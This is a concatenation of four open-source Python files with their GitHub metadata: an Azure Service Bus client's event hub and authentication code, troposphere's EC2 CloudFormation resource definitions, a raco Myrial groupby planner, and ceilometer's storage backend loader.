request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except AzureHttpError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_event_hub(self, hub_name):
'''
Retrieves an existing event hub.
hub_name:
Name of the event hub.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(hub_name) + ''
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_event_hub(response)
def send_event(self, hub_name, message, device_id=None,
broker_properties=None):
'''
Sends a new message event to an Event Hub.
hub_name:
Name of event hub.
message:
The message body to send.
device_id:
Optional. Identifier of the publisher (device) sending the event.
broker_properties:
Optional. Broker properties to attach to the message.
'''
_validate_not_none('hub_name', hub_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
if device_id:
request.path = '/{0}/publishers/{1}/messages?api-version=2014-01'.format(hub_name, device_id)
else:
request.path = '/{0}/messages?api-version=2014-01'.format(hub_name)
if broker_properties:
request.headers.append(
('BrokerProperties', str(broker_properties)))
request.body = _get_request_body(message)
request.path, request.query = self._httpclient._update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
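# Hedged usage sketch (hub name, payload and device id are illustrative):
#
#   sbs.send_event('myhub', '{"temperature": 21.5}', device_id='device-1')
#
# Note that broker_properties is passed through str(), so callers may want
# to supply a pre-formatted JSON string rather than a plain dict.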
def _get_host(self):
return self.service_namespace + self.host_base
def _perform_request(self, request):
try:
resp = self._filter(request)
except HTTPError as ex:
return _service_bus_error_handler(ex)
return resp
def _update_service_bus_header(self, request):
''' Add additional headers for service bus. '''
if request.method in ['PUT', 'POST', 'MERGE', 'DELETE']:
request.headers.append(('Content-Length', str(len(request.body))))
# if it is not GET or HEAD request, must set content-type.
if request.method not in ['GET', 'HEAD']:
for name, _ in request.headers:
if 'content-type' == name.lower():
break
else:
request.headers.append(
('Content-Type',
'application/atom+xml;type=entry;charset=utf-8'))
# Adds authorization header for authentication.
self.authentication.sign_request(request, self._httpclient)
return request.headers
# Token cache for Authentication
# Shared by the different instances of ServiceBusWrapTokenAuthentication
_tokens = {}
class ServiceBusWrapTokenAuthentication:
def __init__(self, account_key, issuer):
self.account_key = account_key
self.issuer = issuer
def sign_request(self, request, httpclient):
request.headers.append(
('Authorization', self._get_authorization(request, httpclient)))
def _get_authorization(self, request, httpclient):
''' return the signed string with token. '''
return 'WRAP access_token="' + \
self._get_token(request.host, request.path, httpclient) + '"'
def _token_is_expired(self, token):
''' Check if token expires or not. '''
time_pos_begin = token.find('ExpiresOn=') + len('ExpiresOn=')
time_pos_end = token.find('&', time_pos_begin)
token_expire_time = int(token[time_pos_begin:time_pos_end])
time_now = time.mktime(time.localtime())
# Keep a 30-second buffer so the token has not expired by the time it
# reaches the server.
return (token_expire_time - time_now) < 30
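# Worked example: a token containing '...&ExpiresOn=1400000000&...' yields
# token_expire_time == 1400000000; the token is treated as expired once
# fewer than 30 seconds remain before that instant.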
def _get_token(self, host, path, httpclient):
'''
Returns token for the request.
host:
the service bus service request.
path:
the service bus service request.
'''
wrap_scope = 'http://' + host + path + self.issuer + self.account_key
# Return the cached token for this scope if one exists and has not
# expired.
if wrap_scope in _tokens:
token = _tokens[wrap_scope]
if not self._token_is_expired(token):
return token
# Get a new token from the access control server.
request = HTTPRequest()
request.protocol_override = 'https'
request.host = host.replace('.servicebus.', '-sb.accesscontrol.')
request.method = 'POST'
request.path = '/WRAPv0.9'
request.body = ('wrap_name=' + url_quote(self.issuer) +
'&wrap_password=' + url_quote(self.account_key) +
'&wrap_scope=' +
url_quote('http://' + host + path)).encode('utf-8')
request.headers.append(('Content-Length', str(len(request.body))))
resp = httpclient.perform_request(request)
token = resp.body.decode('utf-8-sig')
token = url_unquote(token[token.find('=') + 1:token.rfind('&')])
_tokens[wrap_scope] = token
return token
class ServiceBusSASAuthentication:
def __init__(self, key_name, key_value):
self.key_name = key_name
self.key_value = key_value
def sign_request(self, request, httpclient):
request.headers.append(
('Authorization', self._get_authorization(request, httpclient)))
def _get_authorization(self, request, httpclient):
uri = httpclient.get_uri(request)
uri = url_quote(uri, '').lower()
expiry = str(self._get_expiry())
to_sign = uri + '\n' + expiry
signature = url_quote(_sign_string(self.key_value, to_sign, False), '')
auth_format = 'SharedAccessSignature sig={0}&se={1}&skn={2}&sr={3}'
auth = auth_format.format(signature, expiry, self.key_name, uri)
return auth
def _get_expiry(self):
'''Returns the UTC datetime, in seconds since Epoch, when this signed
request expires (5 minutes from now).'''
return int(round(time.time() + 300))
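# Hedged usage sketch (the key name and value are illustrative):
#
#   auth = ServiceBusSASAuthentication('RootManageSharedAccessKey', key)
#   auth.sign_request(request, httpclient)
#
# The signed request then carries an Authorization header of the form
#   SharedAccessSignature sig=<sig>&se=<expiry>&skn=<key name>&sr=<uri>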
|
{
"content_hash": "ecb2dc4e23e7bb15227774180d2278a6",
"timestamp": "",
"source": "github",
"line_count": 1349,
"max_line_length": 106,
"avg_line_length": 40.223128243143066,
"alnum_prop": 0.6013895799929968,
"repo_name": "SUSE/azure-sdk-for-python",
"id": "83dd5e85c09d35486b40483990b3f98150d5532e",
"size": "54263",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "azure-servicebus/azure/servicebus/servicebusservice.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9090161"
}
],
"symlink_target": ""
}
|
from . import AWSHelperFn, AWSObject, AWSProperty
from .validators import (
boolean, exactly_one, integer, integer_range,
network_port, positive_integer
)
try:
from awacs.aws import Policy
policytypes = (dict, Policy)
except ImportError:
policytypes = dict,
class Tag(AWSProperty):
props = {
'Key': (basestring, True),
'Value': (basestring, True)
}
def __init__(self, key=None, value=None, **kwargs):
# provided for backward compatibility
if key is not None:
kwargs['Key'] = key
if value is not None:
kwargs['Value'] = value
super(Tag, self).__init__(**kwargs)
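# Both construction styles below are equivalent; the positional form is
# the backward-compatible one handled by __init__ above:
#
#   Tag('Name', 'web-server')
#   Tag(Key='Name', Value='web-server')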
class CustomerGateway(AWSObject):
resource_type = "AWS::EC2::CustomerGateway"
props = {
'BgpAsn': (integer, True),
'IpAddress': (basestring, True),
'Tags': (list, False),
'Type': (basestring, True),
}
class DHCPOptions(AWSObject):
resource_type = "AWS::EC2::DHCPOptions"
props = {
'DomainName': (basestring, False),
'DomainNameServers': (list, False),
'NetbiosNameServers': (list, False),
'NetbiosNodeType': (integer, False),
'NtpServers': (list, False),
'Tags': (list, False),
}
class EgressOnlyInternetGateway(AWSObject):
resource_type = "AWS::EC2::EgressOnlyInternetGateway"
props = {
'VpcId': (basestring, True),
}
class EIP(AWSObject):
resource_type = "AWS::EC2::EIP"
props = {
'InstanceId': (basestring, False),
'Domain': (basestring, False),
}
class EIPAssociation(AWSObject):
resource_type = "AWS::EC2::EIPAssociation"
props = {
'AllocationId': (basestring, False),
'EIP': (basestring, False),
'InstanceId': (basestring, False),
'NetworkInterfaceId': (basestring, False),
'PrivateIpAddress': (basestring, False),
}
class FlowLog(AWSObject):
resource_type = "AWS::EC2::FlowLog"
props = {
'DeliverLogsPermissionArn': (basestring, True),
'LogGroupName': (basestring, True),
'ResourceId': (basestring, True),
'ResourceType': (basestring, True),
'TrafficType': (basestring, True),
}
class NatGateway(AWSObject):
resource_type = "AWS::EC2::NatGateway"
props = {
'AllocationId': (basestring, True),
'SubnetId': (basestring, True),
}
class EBSBlockDevice(AWSProperty):
props = {
'DeleteOnTermination': (boolean, False),
'Encrypted': (boolean, False),
'Iops': (integer, False), # Conditional
'SnapshotId': (basestring, False), # Conditional
'VolumeSize': (integer, False), # Conditional
'VolumeType': (basestring, False),
}
class BlockDeviceMapping(AWSProperty):
props = {
'DeviceName': (basestring, True),
'Ebs': (EBSBlockDevice, False), # Conditional
'NoDevice': (dict, False),
'VirtualName': (basestring, False), # Conditional
}
class MountPoint(AWSProperty):
props = {
'Device': (basestring, True),
'VolumeId': (basestring, True),
}
class Placement(AWSProperty):
props = {
'AvailabilityZone': (basestring, False),
'GroupName': (basestring, False),
}
class Ipv6Addresses(AWSHelperFn):
def __init__(self, address):
self.data = {
'Ipv6Address': address,
}
class PrivateIpAddressSpecification(AWSProperty):
props = {
'Primary': (boolean, True),
'PrivateIpAddress': (basestring, True),
}
class NetworkInterfaceProperty(AWSProperty):
props = {
'AssociatePublicIpAddress': (boolean, False),
'DeleteOnTermination': (boolean, False),
'Description': (basestring, False),
'DeviceIndex': (integer, True),
'GroupSet': ([basestring], False),
'NetworkInterfaceId': (basestring, False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'PrivateIpAddress': (basestring, False),
'PrivateIpAddresses': ([PrivateIpAddressSpecification], False),
'SecondaryPrivateIpAddressCount': (integer, False),
'SubnetId': (basestring, False),
}
class AssociationParameters(AWSProperty):
props = {
'Key': (basestring, True),
'Value': ([basestring], True),
}
class SsmAssociations(AWSProperty):
props = {
'AssociationParameters': ([AssociationParameters], False),
'DocumentName': (basestring, True),
}
class Host(AWSObject):
resource_type = "AWS::EC2::Host"
props = {
'AutoPlacement': (basestring, False),
'AvailabilityZone': (basestring, True),
'InstanceType': (basestring, True),
}
class Instance(AWSObject):
resource_type = "AWS::EC2::Instance"
props = {
'Affinity': (basestring, False),
'AvailabilityZone': (basestring, False),
'BlockDeviceMappings': (list, False),
'DisableApiTermination': (boolean, False),
'EbsOptimized': (boolean, False),
'HostId': (basestring, False),
'IamInstanceProfile': (basestring, False),
'ImageId': (basestring, True),
'InstanceInitiatedShutdownBehavior': (basestring, False),
'InstanceType': (basestring, False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'KernelId': (basestring, False),
'KeyName': (basestring, False),
'Monitoring': (boolean, False),
'NetworkInterfaces': ([NetworkInterfaceProperty], False),
'PlacementGroupName': (basestring, False),
'PrivateIpAddress': (basestring, False),
'RamdiskId': (basestring, False),
'SecurityGroupIds': (list, False),
'SecurityGroups': (list, False),
'SsmAssociations': ([SsmAssociations], False),
'SourceDestCheck': (boolean, False),
'SubnetId': (basestring, False),
'Tags': (list, False),
'Tenancy': (basestring, False),
'UserData': (basestring, False),
'Volumes': (list, False),
}
class InternetGateway(AWSObject):
resource_type = "AWS::EC2::InternetGateway"
props = {
'Tags': (list, False),
}
class NetworkAcl(AWSObject):
resource_type = "AWS::EC2::NetworkAcl"
props = {
'Tags': (list, False),
'VpcId': (basestring, True),
}
class ICMP(AWSProperty):
props = {
'Code': (integer, False),
'Type': (integer, False),
}
class PortRange(AWSProperty):
props = {
'From': (network_port, False),
'To': (network_port, False),
}
class NetworkAclEntry(AWSObject):
resource_type = "AWS::EC2::NetworkAclEntry"
props = {
'CidrBlock': (basestring, False),
'Egress': (boolean, False),
'Icmp': (ICMP, False), # Conditional
'Ipv6CidrBlock': (basestring, False),
'NetworkAclId': (basestring, True),
'PortRange': (PortRange, False), # Conditional
'Protocol': (network_port, True),
'RuleAction': (basestring, True),
'RuleNumber': (integer_range(1, 32766), True),
}
def validate(self):
conds = [
'CidrBlock',
'Ipv6CidrBlock',
]
exactly_one(self.__class__.__name__, self.properties, conds)
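# exactly_one() rejects the entry unless precisely one of CidrBlock and
# Ipv6CidrBlock is set. A hedged sketch (the title, Ref() usage and
# values are illustrative):
#
#   NetworkAclEntry('AllowHttp', NetworkAclId=Ref(acl), Protocol='6',
#                   RuleAction='allow', RuleNumber=100,
#                   CidrBlock='10.0.0.0/24',
#                   PortRange=PortRange(From='80', To='80'))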
class NetworkInterface(AWSObject):
resource_type = "AWS::EC2::NetworkInterface"
props = {
'Description': (basestring, False),
'GroupSet': (list, False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'PrivateIpAddress': (basestring, False),
'PrivateIpAddresses': ([PrivateIpAddressSpecification], False),
'SecondaryPrivateIpAddressCount': (integer, False),
'SourceDestCheck': (boolean, False),
'SubnetId': (basestring, True),
'Tags': (list, False),
}
class NetworkInterfaceAttachment(AWSObject):
resource_type = "AWS::EC2::NetworkInterfaceAttachment"
props = {
'DeleteOnTermination': (boolean, False),
'DeviceIndex': (integer, True),
'InstanceId': (basestring, True),
'NetworkInterfaceId': (basestring, True),
}
class Route(AWSObject):
resource_type = "AWS::EC2::Route"
props = {
'DestinationCidrBlock': (basestring, False),
'DestinationIpv6CidrBlock': (basestring, False),
'GatewayId': (basestring, False),
'InstanceId': (basestring, False),
'NatGatewayId': (basestring, False),
'NetworkInterfaceId': (basestring, False),
'RouteTableId': (basestring, True),
'VpcPeeringConnectionId': (basestring, False),
}
def validate(self):
conds = [
'DestinationCidrBlock',
'DestinationIpv6CidrBlock',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class RouteTable(AWSObject):
resource_type = "AWS::EC2::RouteTable"
props = {
'Tags': (list, False),
'VpcId': (basestring, True),
}
class SecurityGroupEgress(AWSObject):
resource_type = "AWS::EC2::SecurityGroupEgress"
props = {
'CidrIp': (basestring, False),
'CidrIpv6': (basestring, False),
'DestinationPrefixListId': (basestring, False),
'DestinationSecurityGroupId': (basestring, False),
'FromPort': (network_port, True),
'GroupId': (basestring, True),
'IpProtocol': (basestring, True),
'ToPort': (network_port, True),
#
# Workaround for a bug in CloudFormation and EC2 where the
# DestinationSecurityGroupId property is ignored causing
# egress rules targeting a security group to be ignored.
# Using SourceSecurityGroupId instead works fine even in
# egress rules. AWS has known about this bug for a while.
#
'SourceSecurityGroupId': (basestring, False),
}
def validate(self):
conds = [
'CidrIp',
'CidrIpv6',
'DestinationPrefixListId',
'DestinationSecurityGroupId',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class SecurityGroupIngress(AWSObject):
resource_type = "AWS::EC2::SecurityGroupIngress"
props = {
'CidrIp': (basestring, False),
'CidrIpv6': (basestring, False),
'FromPort': (network_port, False), # conditional
'GroupName': (basestring, False),
'GroupId': (basestring, False),
'IpProtocol': (basestring, True),
'SourceSecurityGroupName': (basestring, False),
'SourceSecurityGroupId': (basestring, False),
'SourceSecurityGroupOwnerId': (basestring, False),
'ToPort': (network_port, False), # conditional
}
def validate(self):
conds = [
'CidrIp',
'CidrIpv6',
'SourceSecurityGroupName',
'SourceSecurityGroupId',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class SecurityGroupRule(AWSProperty):
props = {
'CidrIp': (basestring, False),
'CidrIpv6': (basestring, False),
'FromPort': (network_port, False),
'IpProtocol': (basestring, True),
'SourceSecurityGroupId': (basestring, False),
'SourceSecurityGroupName': (basestring, False),
'SourceSecurityGroupOwnerId': (basestring, False),
'ToPort': (network_port, False),
'DestinationSecurityGroupId': (basestring, False),
}
class SecurityGroup(AWSObject):
resource_type = "AWS::EC2::SecurityGroup"
props = {
'GroupName': (basestring, False),
'GroupDescription': (basestring, True),
'SecurityGroupEgress': (list, False),
'SecurityGroupIngress': (list, False),
'VpcId': (basestring, False),
'Tags': (list, False),
}
class Subnet(AWSObject):
resource_type = "AWS::EC2::Subnet"
props = {
'AvailabilityZone': (basestring, False),
'CidrBlock': (basestring, True),
'MapPublicIpOnLaunch': (boolean, False),
'Tags': (list, False),
'VpcId': (basestring, True),
}
class SubnetNetworkAclAssociation(AWSObject):
resource_type = "AWS::EC2::SubnetNetworkAclAssociation"
props = {
'SubnetId': (basestring, True),
'NetworkAclId': (basestring, True),
}
class SubnetRouteTableAssociation(AWSObject):
resource_type = "AWS::EC2::SubnetRouteTableAssociation"
props = {
'RouteTableId': (basestring, True),
'SubnetId': (basestring, True),
}
class Volume(AWSObject):
resource_type = "AWS::EC2::Volume"
props = {
'AutoEnableIO': (boolean, False),
'AvailabilityZone': (basestring, True),
'Encrypted': (boolean, False),
'Iops': (positive_integer, False),
'KmsKeyId': (basestring, False),
'Size': (positive_integer, False),
'SnapshotId': (basestring, False),
'Tags': (list, False),
'VolumeType': (basestring, False),
}
class VolumeAttachment(AWSObject):
resource_type = "AWS::EC2::VolumeAttachment"
props = {
'Device': (basestring, True),
'InstanceId': (basestring, True),
'VolumeId': (basestring, True),
}
class VPC(AWSObject):
resource_type = "AWS::EC2::VPC"
props = {
'CidrBlock': (basestring, True),
'EnableDnsSupport': (boolean, False),
'EnableDnsHostnames': (boolean, False),
'InstanceTenancy': (basestring, False),
'Tags': (list, False),
}
class VPCDHCPOptionsAssociation(AWSObject):
resource_type = "AWS::EC2::VPCDHCPOptionsAssociation"
props = {
'DhcpOptionsId': (basestring, True),
'VpcId': (basestring, True),
}
class VPCEndpoint(AWSObject):
resource_type = "AWS::EC2::VPCEndpoint"
props = {
'PolicyDocument': (policytypes, False),
'RouteTableIds': ([basestring], False),
'ServiceName': (basestring, True),
'VpcId': (basestring, True),
}
class VPCGatewayAttachment(AWSObject):
resource_type = "AWS::EC2::VPCGatewayAttachment"
props = {
'InternetGatewayId': (basestring, False),
'VpcId': (basestring, True),
'VpnGatewayId': (basestring, False),
}
class VPNConnection(AWSObject):
resource_type = "AWS::EC2::VPNConnection"
props = {
'Type': (basestring, True),
'CustomerGatewayId': (basestring, True),
'StaticRoutesOnly': (boolean, False),
'Tags': (list, False),
'VpnGatewayId': (basestring, True),
}
class VPNConnectionRoute(AWSObject):
resource_type = "AWS::EC2::VPNConnectionRoute"
props = {
'DestinationCidrBlock': (basestring, True),
'VpnConnectionId': (basestring, True),
}
class VPNGateway(AWSObject):
resource_type = "AWS::EC2::VPNGateway"
props = {
'Type': (basestring, True),
'Tags': (list, False),
}
class VPNGatewayRoutePropagation(AWSObject):
resource_type = "AWS::EC2::VPNGatewayRoutePropagation"
props = {
'RouteTableIds': ([basestring], True),
'VpnGatewayId': (basestring, True),
}
class VPCPeeringConnection(AWSObject):
resource_type = "AWS::EC2::VPCPeeringConnection"
props = {
'PeerVpcId': (basestring, True),
'VpcId': (basestring, True),
'Tags': (list, False),
'PeerOwnerId': (basestring, False),
'PeerRoleArn': (basestring, False),
}
class Monitoring(AWSProperty):
props = {
'Enabled': (boolean, False),
}
class NetworkInterfaces(AWSProperty):
props = {
'AssociatePublicIpAddress': (boolean, False),
'DeleteOnTermination': (boolean, False),
'Description': (basestring, False),
'DeviceIndex': (integer, True),
'Groups': ([basestring], False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'NetworkInterfaceId': (basestring, False),
'PrivateIpAddresses': ([PrivateIpAddressSpecification], False),
'SecondaryPrivateIpAddressCount': (integer, False),
'SubnetId': (basestring, False),
}
class SecurityGroups(AWSProperty):
props = {
'GroupId': (basestring, False),
}
class IamInstanceProfile(AWSProperty):
props = {
'Arn': (basestring, False),
}
class LaunchSpecifications(AWSProperty):
props = {
'BlockDeviceMappings': ([BlockDeviceMapping], False),
'EbsOptimized': (boolean, False),
'IamInstanceProfile': (IamInstanceProfile, False),
'ImageId': (basestring, True),
'InstanceType': (basestring, True),
'KernelId': (basestring, False),
'KeyName': (basestring, False),
'Monitoring': (Monitoring, False),
'NetworkInterfaces': ([NetworkInterfaces], False),
'Placement': (Placement, False),
'RamdiskId': (basestring, False),
'SecurityGroups': ([SecurityGroups], False),
'SpotPrice': (basestring, False),
'SubnetId': (basestring, False),
'UserData': (basestring, False),
'WeightedCapacity': (positive_integer, False),
}
class SpotFleetRequestConfigData(AWSProperty):
props = {
'AllocationStrategy': (basestring, False),
'ExcessCapacityTerminationPolicy': (basestring, False),
'IamFleetRole': (basestring, True),
'LaunchSpecifications': ([LaunchSpecifications], True),
'SpotPrice': (basestring, True),
'TargetCapacity': (positive_integer, True),
'TerminateInstancesWithExpiration': (boolean, False),
'ValidFrom': (basestring, False),
'ValidUntil': (basestring, False),
}
class SpotFleet(AWSObject):
resource_type = "AWS::EC2::SpotFleet"
props = {
'SpotFleetRequestConfigData': (SpotFleetRequestConfigData, True),
}
class PlacementGroup(AWSObject):
resource_type = "AWS::EC2::PlacementGroup"
props = {
'Strategy': (basestring, True),
}
class SubnetCidrBlock(AWSObject):
resource_type = "AWS::EC2::SubnetCidrBlock"
props = {
'Ipv6CidrBlock': (basestring, True),
'SubnetId': (basestring, True),
}
class VPCCidrBlock(AWSObject):
resource_type = "AWS::EC2::VPCCidrBlock"
props = {
'AmazonProvidedIpv6CidrBlock': (boolean, False),
'VpcId': (basestring, True),
}
|
{
"content_hash": "a4215d4acae567de30b44f346f7bfe8f",
"timestamp": "",
"source": "github",
"line_count": 674,
"max_line_length": 73,
"avg_line_length": 27.4540059347181,
"alnum_prop": 0.5985732814526589,
"repo_name": "7digital/troposphere",
"id": "80201ec3534cb5fc2e48a8dd4c54e22c1afc8d90",
"size": "18620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "troposphere/ec2.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "579"
},
{
"name": "Python",
"bytes": "356311"
},
{
"name": "Shell",
"bytes": "60"
}
],
"symlink_target": ""
}
|
"""
Implementation of groupby/aggregation in Myrial.
The inputs are a child Operator and a list of column mappings, each defined
by tuples of the form: (column_name, scalar_expression). The outputs are
(possibly) revised operators and list of column mappings.
The basic algorithm:
1) Scan the list of columns looking for any aggregate expressions. If none
are found, then we return the inputs unmodified.
2) Next, we scan each column, switching on whether the scalar expression
contains any aggregate expression:
2A) Columns without aggregate expressions are "groupby" terms. We add such
terms to a list of groupby terms.
2B) Columns with aggregate expressions are "aggregation" terms. We record all
aggregate expressions in a list (actually, an OrderedDict). And, we apply
a "hoisting" procedure whereby each aggregate expression is replaced by
a reference to a raw column reference. As an example:
range = max(salary) - min(salary)
==>
range = $4 - $5
3) We create a GroupBy relational algebra operation with the grouping terms
and aggregate terms calculated in steps 2A and 2B.
4) We return an updated set of column mappings; the Myrial interpreter
uses these mappings to form an Apply operator that stitches up the column
names and values as expected by the caller.
"""
import collections
import raco.algebra  # used to construct the GroupBy/Apply operators below
import raco.expression
from raco.myrial.exceptions import *
class NonGroupedAccessException(Exception):
"""Attempting to access a non-grouping term in an aggregate expression"""
pass
class AggregateState(object):
def __init__(self, initial_aggregate_pos):
# Mapping from an aggregate scalar expression (e.g., MAX(salary)) to
# a non-aggregate scalar expression (a raw column index).
self.aggregates = collections.OrderedDict()
# Next index to be assigned for aggregate expressions
self.aggregate_pos = initial_aggregate_pos
def __hoist_aggregates(sexpr, agg_state, group_mappings, input_scheme):
def hoist_node(sexpr):
if isinstance(sexpr, raco.expression.AttributeRef):
# Translate the attribute ref to the schema that will exist
# after the GroupBy
input_pos = sexpr.get_position(input_scheme)
if input_pos not in group_mappings:
raise NonGroupedAccessException(str(sexpr))
output_pos = group_mappings[input_pos]
return raco.expression.UnnamedAttributeRef(output_pos)
if not isinstance(sexpr, raco.expression.AggregateExpression):
return sexpr
if sexpr in agg_state.aggregates:
return agg_state.aggregates[sexpr]
else:
out = raco.expression.UnnamedAttributeRef(agg_state.aggregate_pos)
agg_state.aggregates[sexpr] = out
agg_state.aggregate_pos += 1
return out
def recursive_eval(sexpr):
"""Apply hoisting to a scalar expression and all its descendents"""
newexpr = hoist_node(sexpr)
newexpr.apply(recursive_eval)
return newexpr
return recursive_eval(sexpr)
def groupby(op, emit_clause, extra_grouping_columns, statemods=None):
"""Process groupby/aggregation expressions."""
assert emit_clause
# A mapping from input position (before the GroupBy) to output position
# (after the GroupBy) for grouping terms. This allows aggregate terms
# to refer to grouping fields.
group_mappings = {}
scheme = op.scheme()
num_group_terms = 0
for name, sexpr in emit_clause:
if not raco.expression.expression_contains_aggregate(sexpr):
if isinstance(sexpr, raco.expression.AttributeRef):
group_mappings[sexpr.get_position(scheme)] = num_group_terms
num_group_terms += 1
# The user must have specified an aggregate expression to trigger
# a groupby invocation.
assert num_group_terms != len(emit_clause)
# Add extra grouping columns; we group by these terms, but the output
# is not preserved in the final apply invocation. These are columns
# that were referenced in unbox expressions.
for col in extra_grouping_columns:
group_mappings[col] = num_group_terms
num_group_terms += 1
# State about scalar expressions with aggregates
agg_state = AggregateState(num_group_terms)
# mappings from column name to scalar expressions; these mappings are
# applied after the GroupBy operator to stitch up column names and values.
output_mappings = []
# A subset of the scalar expressions in the emit clause that do
# not contain aggregate expressions; these become the grouping terms
# to the GroupBy operator.
group_terms = []
for name, sexpr in emit_clause:
if raco.expression.expression_contains_aggregate(sexpr):
output_mappings.append(
(name, __hoist_aggregates(sexpr, agg_state, group_mappings,
scheme)))
else:
output_mappings.append((
name, raco.expression.UnnamedAttributeRef(len(group_terms))))
group_terms.append(sexpr)
# Add extra grouping columns; note that these are not present in the
# output mappings.
group_terms.extend([raco.expression.UnnamedAttributeRef(c)
for c in extra_grouping_columns])
agg_terms = agg_state.aggregates.keys()
op1 = raco.algebra.GroupBy(group_terms, agg_terms, op, statemods)
return raco.algebra.Apply(emitters=output_mappings, input=op1)
|
{
"content_hash": "1af54c014cbd4525b421e44f5d357763",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 78,
"avg_line_length": 37.78767123287671,
"alnum_prop": 0.6931303244516948,
"repo_name": "uwescience/raco",
"id": "525f5bdf94f88d0122d7fbc1a5bf847fbe9a7b57",
"size": "5518",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "raco/myrial/groupby.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1777"
},
{
"name": "C++",
"bytes": "81472"
},
{
"name": "Makefile",
"bytes": "1063"
},
{
"name": "Python",
"bytes": "1035525"
},
{
"name": "Ruby",
"bytes": "3706"
},
{
"name": "Shell",
"bytes": "282"
}
],
"symlink_target": ""
}
|
"""Storage backend management
"""
import urlparse
from oslo.config import cfg
from stevedore import driver
from ceilometer.openstack.common.gettextutils import _ # noqa
from ceilometer.openstack.common import log
from ceilometer import service
from ceilometer import utils
LOG = log.getLogger(__name__)
STORAGE_ENGINE_NAMESPACE = 'ceilometer.storage'
OLD_STORAGE_OPTS = [
cfg.StrOpt('database_connection',
secret=True,
default=None,
help='DEPRECATED - Database connection string',
),
]
cfg.CONF.register_opts(OLD_STORAGE_OPTS)
STORAGE_OPTS = [
cfg.IntOpt('time_to_live',
default=-1,
help="""number of seconds that samples are kept
in the database for (<= 0 means forever)"""),
]
cfg.CONF.register_opts(STORAGE_OPTS, group='database')
cfg.CONF.import_opt('connection',
'ceilometer.openstack.common.db.sqlalchemy.session',
group='database')
class StorageBadVersion(Exception):
"""Error raised when the storage backend version is not good enough."""
def get_engine(conf):
"""Load the configured engine and return an instance."""
if conf.database_connection:
conf.set_override('connection', conf.database_connection,
group='database')
engine_name = urlparse.urlparse(conf.database.connection).scheme
LOG.debug(_('looking for %(name)r driver in %(namespace)r') % (
{'name': engine_name,
'namespace': STORAGE_ENGINE_NAMESPACE}))
mgr = driver.DriverManager(STORAGE_ENGINE_NAMESPACE,
engine_name,
invoke_on_load=True)
return mgr.driver
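# For example, a configured connection of
# 'mongodb://localhost:27017/ceilometer' yields engine_name 'mongodb';
# stevedore then instantiates the driver registered under that name in
# the 'ceilometer.storage' entry-point namespace.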
def get_connection(conf):
"""Return an open connection to the database."""
return get_engine(conf).get_connection(conf)
class SampleFilter(object):
"""Holds the properties for building a query from a meter/sample filter.
:param user: The sample owner.
:param project: The sample project.
:param start: Earliest time point in the request.
:param start_timestamp_op: Earliest timestamp operation in the request.
:param end: Latest time point in the request.
:param end_timestamp_op: Latest timestamp operation in the request.
:param resource: Optional filter for resource id.
:param meter: Optional filter for meter type using the meter name.
:param source: Optional source filter.
:param metaquery: Optional filter on the metadata
"""
def __init__(self, user=None, project=None,
start=None, start_timestamp_op=None,
end=None, end_timestamp_op=None,
resource=None, meter=None,
source=None, metaquery=None):
self.user = user
self.project = project
self.start = utils.sanitize_timestamp(start)
self.start_timestamp_op = start_timestamp_op
self.end = utils.sanitize_timestamp(end)
self.end_timestamp_op = end_timestamp_op
self.resource = resource
self.meter = meter
self.source = source
# default to a fresh dict to avoid sharing a mutable default argument
self.metaquery = metaquery if metaquery is not None else {}
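# A hedged usage sketch (meter name and timestamps are illustrative; the
# get_samples() driver call is assumed from the storage connection API):
#
#   f = SampleFilter(meter='cpu_util',
#                    start='2014-01-01T00:00:00',
#                    start_timestamp_op='ge')
#   samples = get_connection(cfg.CONF).get_samples(f)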
class EventFilter(object):
"""Properties for building an Event query.
:param start: UTC start datetime (mandatory)
:param end: UTC end datetime (mandatory)
:param event_type: the name of the event. None for all.
:param traits: the trait filter dict, all of which are optional
{'key': <key>,
't_string': <value>,
't_int': <value>,
't_datetime': <value>
't_float': <value>}
currently, only one trait dict is supported.
"""
def __init__(self, start, end, event_type=None, traits=None):
self.start = utils.sanitize_timestamp(start)
self.end = utils.sanitize_timestamp(end)
self.event_type = event_type
# default to a fresh dict to avoid sharing a mutable default argument
self.traits = traits or {}
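# Example trait filter, following the dict shape documented above (the
# event type and trait values are illustrative):
#
#   EventFilter(start, end,
#               event_type='compute.instance.create.end',
#               traits={'key': 'resource_id', 't_string': 'my-instance'})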
def dbsync():
service.prepare_service()
get_connection(cfg.CONF).upgrade()
def expirer():
service.prepare_service()
LOG.debug(_("Clearing expired metering data"))
storage_conn = get_connection(cfg.CONF)
storage_conn.clear_expired_metering_data(
cfg.CONF.database.time_to_live)
|
{
"content_hash": "2a717de08b0923b72b362c6ef4ad1e43",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 76,
"avg_line_length": 32.587786259541986,
"alnum_prop": 0.6312953853361443,
"repo_name": "rackerlabs/instrumented-ceilometer",
"id": "a0c39f3c437c540ccc3f6baeaedf5d3bf6026c06",
"size": "4955",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceilometer/storage/__init__.py",
"mode": "33188",
